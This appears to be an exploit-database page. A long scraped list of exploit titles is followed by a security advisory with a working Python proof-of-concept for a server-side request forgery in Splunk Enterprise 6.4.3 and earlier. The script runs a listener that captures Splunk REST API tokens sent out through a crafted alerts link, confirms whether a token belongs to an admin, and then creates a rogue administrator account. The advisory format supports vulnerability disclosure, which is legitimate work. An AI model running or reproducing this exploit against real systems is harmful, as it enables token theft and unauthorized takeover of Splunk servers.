
5 new exploits uTorrent 1.8.3 (Build 15772) - Create New Torrent Buffer Overflow (PoC) uTorrent 1.8.3 Build 15772 - Create New Torrent Buffer Overflow (PoC) F5 BIG-IP - Authentication Bypass (1) F5 BIG-IP - Authentication Bypass (PoC) Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC (1) Linux Kernel 3.4 < 3.13.2 - recvmmsg x32 compat PoC Adobe Photoshop CC & Bridge CC - '.png' File Parsing Memory Corruption (2) Adobe Photoshop CC / Bridge CC - '.png' File Parsing Memory Corruption (2) Microsoft Internet Explorer 9 MSHTML - CDispNode::InsertSiblingNode Use-After-Free (MS13-037) (1) Microsoft Internet Explorer 9 MSHTML - CDispNode::InsertSiblingNode Use-After-Free (MS13-037) (2) Microsoft Internet Explorer 9 MSHTML - CElement::HasFlag Memory Corruption uTorrent - DLL Hijacking uTorrent 2.0.3 - DLL Hijacking F5 BIG-IP - Authentication Bypass (2) F5 BIG-IP - Authentication Bypass SePortal - SQL Injection / Remote Code Execution (Metasploit) SePortal 2.5 - SQL Injection / Remote Code Execution (Metasploit) MyPHP CMS 0.3 - (domain) Remote File Inclusion MyPHP CMS 0.3 - 'domain' Parameter Remote File Inclusion RSS-aggregator - 'display.php path' Remote File Inclusion RSS-aggregator - 'path' Parameter Remote File Inclusion HoMaP-CMS 0.1 - (plugin_admin.php) Remote File Inclusion HomePH Design 2.10 RC2 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities HoMaP-CMS 0.1 - 'plugin_admin.php' Remote File Inclusion HomePH Design 2.10 RC2 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting cmreams CMS 1.3.1.1 beta2 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities cmreams CMS 1.3.1.1 beta2 - Local File Inclusion / Cross-Site Scripting HoMaP-CMS 0.1 - (index.php go) SQL Injection HoMaP-CMS 0.1 - 'go' Parameter SQL Injection Ready2Edit - 'pages.php menuid' SQL Injection ResearchGuide 0.5 - (guide.php id) SQL Injection MVC-Web CMS 1.0/1.2 - (index.asp newsid) SQL Injection Ready2Edit - 'menuid' Parameter SQL Injection ResearchGuide 0.5 - 'id' Parameter SQL Injection MVC-Web CMS 1.0/1.2 - 'newsid' Parameter SQL Injection Demo4 CMS - 'index.php id' SQL Injection Joomla! Component com_facileforms 1.4.4 - Remote File Inclusion Dagger CMS 2008 - (dir_inc) Remote File Inclusion TinxCMS 1.1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities mm chat 1.5 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities ourvideo CMS 9.5 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities cmsWorks 2.2 RC4 - (mod_root) Remote File Inclusion Demo4 CMS - 'id' Parameter SQL Injection Joomla! Component FacileForms 1.4.4 - Remote File Inclusion Dagger CMS 2008 - 'dir_inc' Parameter Remote File Inclusion TinXCMS 1.1 - Local File Inclusion / Cross-Site Scripting mm chat 1.5 - Local File Inclusion / Cross-Site Scripting ourvideo CMS 9.5 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting cmsWorks 2.2 RC4 - 'mod_root' Parameter Remote File Inclusion Relative Real Estate Systems 3.0 - 'listing_id' SQL Injection Relative Real Estate Systems 3.0 - 'listing_id' Parameter SQL Injection DUcalendar 1.0 - (detail.asp iEve) SQL Injection HiveMaker Directory - 'cid' Parameter SQL Injection E-topbiz ViralDX 2.07 - (adclick.php bannerid) SQL Injection Link ADS 1 - 'out.php linkid' SQL Injection TOKOKITA - 'barang.php produk_id' SQL Injection Webdevindo-CMS 0.1 - (index.php hal) SQL Injection mUnky 0.0.1 - (index.php zone) Local File Inclusion Jokes & Funny Pics Script - (sb_jokeid) SQL Injection DUcalendar 1.0 - 'iEve' Parameter SQL Injection HiveMaker Directory 1.0.2 - 'cid' Parameter SQL Injection E-topbiz ViralDX 2.07 - 'bannerid' Parameter SQL Injection Link ADS 1 - 'linkid' Parameter SQL Injection TOKOKITA - 'produk_id' Parameter SQL Injection Webdevindo-CMS 0.1 - 'hal' Parameter SQL Injection mUnky 0.0.1 - 'zone' Parameter Local File Inclusion Jokes & Funny Pics Script - 'sb_jokeid' Parameter SQL Injection MyPHP CMS 0.3.1 - (page.php pid) SQL Injection PHPmotion 2.0 - (update_profile.php) Arbitrary File Upload MyPHP CMS 0.3.1 - 'pid' Parameter SQL Injection PHPmotion 2.0 - 'update_profile.php' Arbitrary File Upload polypager 1.0rc2 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities PHP-Fusion Mod Kroax 4.42 - (category) SQL Injection polypager 1.0rc2 - SQL Injection / Cross-Site Scripting PHP-Fusion Mod Kroax 4.42 - 'category' Parameter SQL Injection Riddles Complete Website 1.2.1 - (riddleid) SQL Injection Tips Complete Website 1.2.0 - (tipid) SQL Injection Jokes Complete Website 2.1.3 - (jokeid) SQL Injection Drinks Complete Website 2.1.0 - (drinkid) SQL Injection Cheats Complete Website 1.1.1 - 'itemID' SQL Injection Riddles Complete Website 1.2.1 - 'riddleid' Parameter SQL Injection Tips Complete Website 1.2.0 - 'tipid' Parameter SQL Injection Easysitenetwork Jokes Complete Website 2.1.3 - 'jokeid' Parameter SQL Injection Drinks Complete Website 2.1.0 - 'drinkid' Parameter SQL Injection Cheats Complete Website 1.1.1 - 'itemID' Parameter SQL Injection Orca 2.0/2.0.2 - (Parameters.php) Remote File Inclusion Orca 2.0/2.0.2 - 'Parameters.php' Remote File Inclusion OTManager CMS 24a - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities OTManager CMS 24a - Local File Inclusion / Cross-Site Scripting SePortal 2.4 - (poll.php poll_id) SQL Injection SePortal 2.4 - 'poll_id' Parameter SQL Injection poweraward 1.1.0 rc1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Joomla! Component jabode - 'id' SQL Injection Online Booking Manager 2.2 - 'id' SQL Injection poweraward 1.1.0 rc1 - Local File Inclusion / Cross-Site Scripting Joomla! Component jabode - 'id' Parameter SQL Injection Online Booking Manager 2.2 - 'id' Parameter SQL Injection Joomla! Component Xe webtv - 'id' Blind SQL Injection Joomla! Component Xe webtv - 'id' Parameter Blind SQL Injection AcmlmBoard 1.A2 - 'pow' SQL Injection eSHOP100 - (SUB) SQL Injection AcmlmBoard 1.A2 - 'pow' Parameter SQL Injection eSHOP100 - 'SUB' Parameter SQL Injection OTManager CMS 2.4 - (Tipo) Remote File Inclusion OTManager CMS 2.4 - 'Tipo' Parameter Remote File Inclusion Orca 2.0.2 - (Topic) Cross-Site Scripting Orca 2.0.2 - Cross-Site Scripting Hedgehog-CMS 1.21 - (Local File Inclusion) Remote Command Execution Hedgehog-CMS 1.21 - Local File Inclusion / Remote Command Execution catviz 0.4.0b1 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Catviz 0.4.0 beta1 - Local File Inclusion / Cross-Site Scripting Joomla! Component com_facileforms - Cross-Site Scripting Joomla! Component FacileForms - Cross-Site Scripting PHPMotion 1.62 - 'FCKeditor' Arbitrary File Upload PHPmotion 1.62 - 'FCKeditor' Arbitrary File Upload Roundcube 1.2.2 - Remote Code Execution Pivot 1.0 - Remote module_db.php File Inclusion Pivot 1.0 - 'module_db.php' Remote File Inclusion MyBloggie 2.1 - 'index.php' year Parameter Cross-Site Scripting MyBloggie 2.1 - 'index.php' Cross-Site Scripting E-topbiz Link ADS 1 - 'out.php' SQL Injection PolyPager 0.9.51/1.0 - 'nr' Parameter Cross-Site Scripting RSS-aggregator 1.0 - admin/fonctions/supprimer_flux.php IdFlux Parameter SQL Injection RSS-aggregator 1.0 - admin/fonctions/supprimer_tag.php IdTag Parameter SQL Injection RSS-aggregator 1.0 - 'admin/fonctions/' Direct Request Administrator Authentication Bypass RSS-aggregator 1.0 - 'IdFlux' Parameter SQL Injection RSS-aggregator 1.0 - 'IdTag' Parameter SQL Injection RSS-aggregator 1.0 - Authentication Bypass Jokes Complete Website - joke.php id Parameter Cross-Site Scripting Jokes Complete Website - results.php searchingred Parameter Cross-Site Scripting Easysitenetwork Jokes Complete Website - 'id' Parameter Cross-Site Scripting Easysitenetwork Jokes Complete Website - 'searchingred' Parameter Cross-Site Scripting Splunk Enterprise 6.4.3 - Server-Side Request Forgery
146 lines
No EOL
5 KiB
Python
Executable file
146 lines
No EOL
5 KiB
Python
Executable file
'''
|
||
( , ) (,
|
||
. '.' ) ('. ',
|
||
). , ('. ( ) (
|
||
(_,) .'), ) _ _,
|
||
/ _____/ / _ \ ____ ____ _____
|
||
\____ \==/ /_\ \ _/ ___\/ _ \ / \
|
||
/ \/ | \\ \__( <_> ) Y Y \
|
||
/______ /\___|__ / \___ >____/|__|_| /
|
||
\/ \/.-. \/ \/:wq
|
||
(x.0)
|
||
'=.|w|.='
|
||
_=''"''=.
|
||
|
||
presents..
|
||
|
||
Splunk Enterprise Server-Side Request Forgery
|
||
Affected versions: Splunk Enterprise <= 6.4.3
|
||
|
||
PDF:
|
||
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
|
||
|
||
+-----------+
|
||
|Description|
|
||
+-----------+
|
||
The Splunk Enterprise application is affected by a server-side request
|
||
forgery vulnerability. This vulnerability can be exploited by an
|
||
attacker via social engineering or other vectors to exfiltrate
|
||
authentication tokens for the Splunk REST API to an external domain.
|
||
|
||
+------------+
|
||
|Exploitation|
|
||
+------------+
|
||
==Server-Side Request Forgery==
|
||
|
||
A server-side request forgery (SSRF) vulnerability exists in the Splunk
|
||
Enterprise web management interface within the Alert functionality. The
|
||
application parses user supplied data in the GET parameter ‘alerts_id’
|
||
to construct a HTTP request to the splunkd daemon listening on TCP port
|
||
8089. Since no validation is carried out on the parameter, an attacker
|
||
can specify an external domain and force the application to make a HTTP
|
||
request to an arbitrary destination host. The issue is aggravated by the
|
||
fact that the application includes the REST API token for the currently
|
||
authenticated user within the Authorization request header.
|
||
|
||
This vulnerability can be exploited via social engineering to obtain
|
||
unauthorized access to the Splunk REST API with the same privilege level
|
||
of the captured API token.
|
||
|
||
[POC SSRF LINK]
|
||
/en-US/alerts/launcher?eai%3Aacl.app=launcher&eai%3Aacl.owner=*&severity=*&alerts_id=[DOMAIN]&search=test
|
||
|
||
The proof of concept below can be used to listen for SSRF connections
|
||
and automatically create a malicious privileged user when an
|
||
administrative token is captured.
|
||
|
||
[POC - splunk-poc.py]
|
||
'''
|
||
|
||
from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer
|
||
import httplib
|
||
import ssl
|
||
import requests
|
||
|
||
token = ''
|
||
|
||
class MyHandler(BaseHTTPRequestHandler):
|
||
def do_GET(self):
|
||
global token
|
||
try:
|
||
token = self.headers.get('Authorization')[7:]
|
||
print "[+] Captured Splunk API token from GET request"
|
||
except Exception, e:
|
||
print "[-] No API token captured on incoming connection..."
|
||
|
||
def adminTokenNotCaptured():
|
||
global token
|
||
if token:
|
||
query = "/services/authentication/httpauth-tokens/" + token
|
||
conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089,
|
||
context=ssl._create_unverified_context())
|
||
conn.putrequest("GET", query)
|
||
conn.putheader("Authorization", "Splunk %s" % token)
|
||
conn.endheaders()
|
||
context = conn.getresponse().read()
|
||
if 'userName">admin' in context:
|
||
print "[+] Confirmed Splunk API token belongs to admin user"
|
||
print "[+] Admin Splunk API Token: %s" % token
|
||
return False
|
||
else:
|
||
print "[!] Splunk API token does not belong to admin user"
|
||
|
||
return True
|
||
|
||
def poc():
|
||
global token
|
||
create_user_uri = "https://<SPLUNK
|
||
IP>:8089/services/authentication/users"
|
||
params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'}
|
||
auth_header = {'Authorization': 'Splunk %s' % token}
|
||
requests.packages.urllib3.disable_warnings()
|
||
response = requests.post(url=create_user_uri, data=params,
|
||
headers=auth_header, verify=False)
|
||
if "<title>infosec" in response.content:
|
||
print "[+] POC admin account 'infosec:password' successfully
|
||
created"
|
||
else:
|
||
print "[-] No account was created"
|
||
print response.content
|
||
|
||
if __name__ == "__main__":
|
||
try:
|
||
print "[+] Starting HTTP Listener"
|
||
server = HTTPServer(("", 8080), MyHandler)
|
||
while adminTokenNotCaptured():
|
||
server.handle_request()
|
||
poc()
|
||
except KeyboardInterrupt:
|
||
print "[+] Stopping HTTP Listener"
|
||
server.socket.close()
|
||
|
||
'''
|
||
+----------+
|
||
| Solution |
|
||
+----------+
|
||
Update to Splunk 6.5.0 or later. Full information about all patched
|
||
versions are provided in the reference links below.
|
||
|
||
+------------+
|
||
| Timeline |
|
||
+------------+
|
||
24/08/2016 – Initial disclosure to vendor
|
||
25/08/2016 – Vendor acknowledges receipt of the advisory and confirms
|
||
vulnerability.
|
||
28/09/2016 – Sent follow up email asking for status update
|
||
30/09/2016 – Vendor replies fixes are being backported to all supported
|
||
versions of the software.
|
||
10/11/2016 – Vendor releases security advisory and patched software versions
|
||
09/12/2016 – Public disclosure
|
||
|
||
+------------+
|
||
| Additional |
|
||
+------------+
|
||
http://security-assessment.com/files/documents/advisory/SplunkAdvisory.pdf
|
||
https://www.splunk.com/view/SP-CAAAPSR [SPL-128840]
|
||
''' |